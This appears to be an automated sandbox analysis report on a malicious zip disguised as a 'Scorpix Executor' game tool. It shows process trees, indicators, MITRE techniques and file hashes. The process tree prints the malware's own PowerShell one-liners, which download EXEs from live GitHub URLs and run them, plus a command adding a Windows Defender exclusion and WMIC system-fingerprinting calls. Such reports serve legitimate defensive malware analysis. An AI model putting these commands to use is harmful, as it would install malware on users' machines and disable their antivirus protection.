hxxps://cdn[.]discordapp[.]com/attachments/1261380070853836902/1261385483586375862/Scorpix-ExecutorV3[.]zip?ex=66961006&is=6694be86&hm=6236c750beacec7beeffc00465f75b6826e12cb2ccbc506871a6c0a4408d856d&

Analysis

max time kernel
53s
max time network
53s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
15/07/2024, 09:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1261380070853836902/1261385483586375862/Scorpix-ExecutorV3.zip?ex=66961006&is=6694be86&hm=6236c750beacec7beeffc00465f75b6826e12cb2ccbc506871a6c0a4408d856d&

Score

10^/10

upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
32	3188	powershell.exe
38	3188	powershell.exe
47	856	powershell.exe
48	856	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
4296	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
4864	ScorpixDLL.exe

Loads dropped DLL 59 IoCs

pid	Process
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023872-841.dat	upx
behavioral1/memory/1668-845-0x00007FF8B4390000-0x00007FF8B4978000-memory.dmp	upx
behavioral1/files/0x0007000000023473-847.dat	upx
behavioral1/files/0x00070000000234aa-853.dat	upx
behavioral1/memory/1668-855-0x00007FF8D0D60000-0x00007FF8D0D6F000-memory.dmp	upx
behavioral1/files/0x0007000000023471-856.dat	upx
behavioral1/files/0x0007000000023476-858.dat	upx
behavioral1/memory/1668-854-0x00007FF8C6D90000-0x00007FF8C6DB4000-memory.dmp	upx
behavioral1/memory/1668-861-0x00007FF8BDA30000-0x00007FF8BDA5D000-memory.dmp	upx
behavioral1/memory/1668-860-0x00007FF8C32D0000-0x00007FF8C32E9000-memory.dmp	upx
behavioral1/files/0x0007000000023876-867.dat	upx
behavioral1/files/0x000700000002347c-880.dat	upx
behavioral1/files/0x0007000000023472-872.dat	upx
behavioral1/files/0x000700000002347d-881.dat	upx
behavioral1/files/0x0007000000023874-889.dat	upx
behavioral1/files/0x0007000000023875-887.dat	upx
behavioral1/files/0x0007000000023479-885.dat	upx
behavioral1/files/0x000700000002347a-883.dat	upx
behavioral1/files/0x0007000000023870-882.dat	upx
behavioral1/files/0x000700000002347b-879.dat	upx
behavioral1/files/0x0007000000023478-876.dat	upx
behavioral1/files/0x0007000000023475-874.dat	upx
behavioral1/files/0x0007000000023474-873.dat	upx
behavioral1/files/0x0007000000023470-871.dat	upx
behavioral1/files/0x0007000000023881-869.dat	upx
behavioral1/files/0x0007000000023880-868.dat	upx
behavioral1/files/0x00070000000234ab-864.dat	upx
behavioral1/files/0x00070000000234a9-863.dat	upx
behavioral1/files/0x0007000000023477-875.dat	upx
behavioral1/memory/1668-892-0x00007FF8B6660000-0x00007FF8B6679000-memory.dmp	upx
behavioral1/memory/1668-897-0x00007FF8B6150000-0x00007FF8B620C000-memory.dmp	upx
behavioral1/memory/1668-895-0x00007FF8B6630000-0x00007FF8B665E000-memory.dmp	upx
behavioral1/files/0x0007000000023884-896.dat	upx
behavioral1/memory/1668-894-0x00007FF8D0230000-0x00007FF8D023D000-memory.dmp	upx
behavioral1/memory/1668-893-0x00007FF8D0610000-0x00007FF8D061D000-memory.dmp	upx
behavioral1/memory/1668-891-0x00007FF8B6680000-0x00007FF8B66B5000-memory.dmp	upx
behavioral1/memory/1668-899-0x00007FF8B6600000-0x00007FF8B662B000-memory.dmp	upx
behavioral1/memory/1668-901-0x00007FF8D0C30000-0x00007FF8D0C5E000-memory.dmp	upx
behavioral1/memory/1668-906-0x00007FF8B58C0000-0x00007FF8B5C35000-memory.dmp	upx
behavioral1/memory/1668-911-0x00007FF8B6050000-0x00007FF8B6062000-memory.dmp	upx
behavioral1/memory/1668-910-0x00007FF8B6070000-0x00007FF8B6085000-memory.dmp	upx
behavioral1/memory/1668-905-0x00007FF8B6090000-0x00007FF8B6148000-memory.dmp	upx
behavioral1/memory/1668-912-0x00007FF8B56C0000-0x00007FF8B57DC000-memory.dmp	upx
behavioral1/memory/1668-913-0x00007FF8B5630000-0x00007FF8B56B7000-memory.dmp	upx
behavioral1/memory/1668-914-0x00007FF8B4390000-0x00007FF8B4978000-memory.dmp	upx
behavioral1/memory/1668-918-0x00007FF8CD460000-0x00007FF8CD46A000-memory.dmp	upx
behavioral1/memory/1668-920-0x00007FF8B5870000-0x00007FF8B5888000-memory.dmp	upx
behavioral1/memory/1668-919-0x00007FF8BDA30000-0x00007FF8BDA5D000-memory.dmp	upx
behavioral1/memory/1668-917-0x00007FF8B5890000-0x00007FF8B58B6000-memory.dmp	upx
behavioral1/memory/1668-916-0x00007FF8D0C20000-0x00007FF8D0C2B000-memory.dmp	upx
behavioral1/memory/1668-915-0x00007FF8B6030000-0x00007FF8B6044000-memory.dmp	upx
behavioral1/memory/1668-923-0x00007FF8AF740000-0x00007FF8AF8B3000-memory.dmp	upx
behavioral1/memory/1668-922-0x00007FF8B5600000-0x00007FF8B5623000-memory.dmp	upx
behavioral1/memory/1668-921-0x00007FF8B6660000-0x00007FF8B6679000-memory.dmp	upx
behavioral1/memory/1668-924-0x00007FF8B55C0000-0x00007FF8B55F8000-memory.dmp	upx
behavioral1/memory/1668-925-0x00007FF8D0C30000-0x00007FF8D0C5E000-memory.dmp	upx
behavioral1/memory/1668-926-0x00007FF8CCDB0000-0x00007FF8CCDBB000-memory.dmp	upx
behavioral1/memory/1668-933-0x00007FF8B5850000-0x00007FF8B585C000-memory.dmp	upx
behavioral1/memory/1668-932-0x00007FF8B5860000-0x00007FF8B586E000-memory.dmp	upx
behavioral1/memory/1668-931-0x00007FF8B6020000-0x00007FF8B602C000-memory.dmp	upx
behavioral1/memory/1668-930-0x00007FF8B82D0000-0x00007FF8B82DC000-memory.dmp	upx
behavioral1/memory/1668-929-0x00007FF8B58C0000-0x00007FF8B5C35000-memory.dmp	upx
behavioral1/memory/1668-928-0x00007FF8C6410000-0x00007FF8C641C000-memory.dmp	upx
behavioral1/memory/1668-927-0x00007FF8C6D80000-0x00007FF8C6D8B000-memory.dmp	upx

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2300	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133655096736571016"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
2768	chrome.exe
2768	chrome.exe
3188	powershell.exe
3188	powershell.exe
3188	powershell.exe
856	powershell.exe
856	powershell.exe
856	powershell.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe
1668	Scorpix-ExecutorV3.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2768	chrome.exe
2768	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe
Token: SeCreatePagefilePrivilege	2768	chrome.exe
Token: SeShutdownPrivilege	2768	chrome.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe
2768	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2768 wrote to memory of 4184	2768	chrome.exe	83
PID 2768 wrote to memory of 4184	2768	chrome.exe	83
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 4780	2768	chrome.exe	85
PID 2768 wrote to memory of 728	2768	chrome.exe	86
PID 2768 wrote to memory of 728	2768	chrome.exe	86
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87
PID 2768 wrote to memory of 4996	2768	chrome.exe	87

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1261380070853836902/1261385483586375862/Scorpix-ExecutorV3.zip?ex=66961006&is=6694be86&hm=6236c750beacec7beeffc00465f75b6826e12cb2ccbc506871a6c0a4408d856d&
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8bd7dcc40,0x7ff8bd7dcc4c,0x7ff8bd7dcc58
  2⤵
  PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,557827128768994834,15168634266927999708,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:4780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2176,i,557827128768994834,15168634266927999708,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2144 /prefetch:3
  2⤵
  PID:728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,557827128768994834,15168634266927999708,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2368 /prefetch:8
  2⤵
  PID:4996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,557827128768994834,15168634266927999708,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:1680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,557827128768994834,15168634266927999708,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:2712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4748,i,557827128768994834,15168634266927999708,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4776 /prefetch:8
  2⤵
  PID:4284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4988,i,557827128768994834,15168634266927999708,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4996 /prefetch:8
  2⤵
  PID:4100

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:4724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4804

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1172

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Scorpix-ExecutorV3.zip\Executor\README.txt
1⤵
PID:1872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Scorpix-ExecutorV3\Executor\Start Executor.bat" "
1⤵
PID:3308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe';$file='Scorpix-ExecutorV3.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3188
- - C:\Users\Admin\Downloads\Scorpix-ExecutorV3\Executor\Scorpix-ExecutorV3.exe
    "C:\Users\Admin\Downloads\Scorpix-ExecutorV3\Executor\Scorpix-ExecutorV3.exe"
    3⤵
    - Executes dropped EXE
    PID:4296
  - - C:\Users\Admin\Downloads\Scorpix-ExecutorV3\Executor\Scorpix-ExecutorV3.exe
      "C:\Users\Admin\Downloads\Scorpix-ExecutorV3\Executor\Scorpix-ExecutorV3.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:1668
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:1328
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        5⤵
        
        PID:2332
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        5⤵
        
        PID:4568
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:1176
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4188
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:664
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:2300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe';$file='ScorpixDLL.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:856
- - C:\Users\Admin\Downloads\Scorpix-ExecutorV3\Executor\ScorpixDLL.exe
    "C:\Users\Admin\Downloads\Scorpix-ExecutorV3\Executor\ScorpixDLL.exe"
    3⤵
    - Executes dropped EXE
    PID:4864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
0a67c4f04f7ed80086c8e4083c77f012

SHA1
647ab969681d2cc4c4891ba5a7304e602ae6bd06

SHA256
03d3ac5fee0c8d7ba70b2fc59716f6dea87d084d445e4df32caef0c778a7fc98

SHA512
1258aa47c3f902c643300f60b32f94a5094e6d03cc4a8337b691965baf60ff885a7207372462a490f752830a28cb0691a2678ac6aa30a3ce3ebe949b97a91bd8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
ee6780440ea578ca54c9a9ef453b8ee8

SHA1
ca439fbe34a323aa85379e2cce161fc4cac2a9fe

SHA256
f663c9449304a4ea520e4d71eef783fd63a63ffa9d20109471ddac4a205cec87

SHA512
da01e385362e4da2b183092c7efdc6d9fef6c0a0f52f60881f5b50a88877b4d87fc9c404fcc9cf1f2ada540181568f034150419901526db1cb6bc1a881164664

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
4a9254d7243cc370b2fa80005b5f87bf

SHA1
18db01ad7c574bac6a607b8da2e4da18e8ae5713

SHA256
c22dc8853e0425208a849d0e5e9b70199b976247d057e3afe7d59d880b4ca859

SHA512
6ae8f6703104e61846e4cfcb711c2a802d2f44f858665958f958e8476431a881a5850077ce004af364c71313af767ab50e63c17e18c51da97b94778e78e41362

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
92KB

MD5
4769aaf4aa712535e8a80ed7efb22d84

SHA1
09e5f9ddfa8d701e0df9f81e62aaa3aa40db776a

SHA256
8f7b3b67a55daee796ccc8d128981fc0d4b9bd9c9f3527f8ccf82844eebc47d5

SHA512
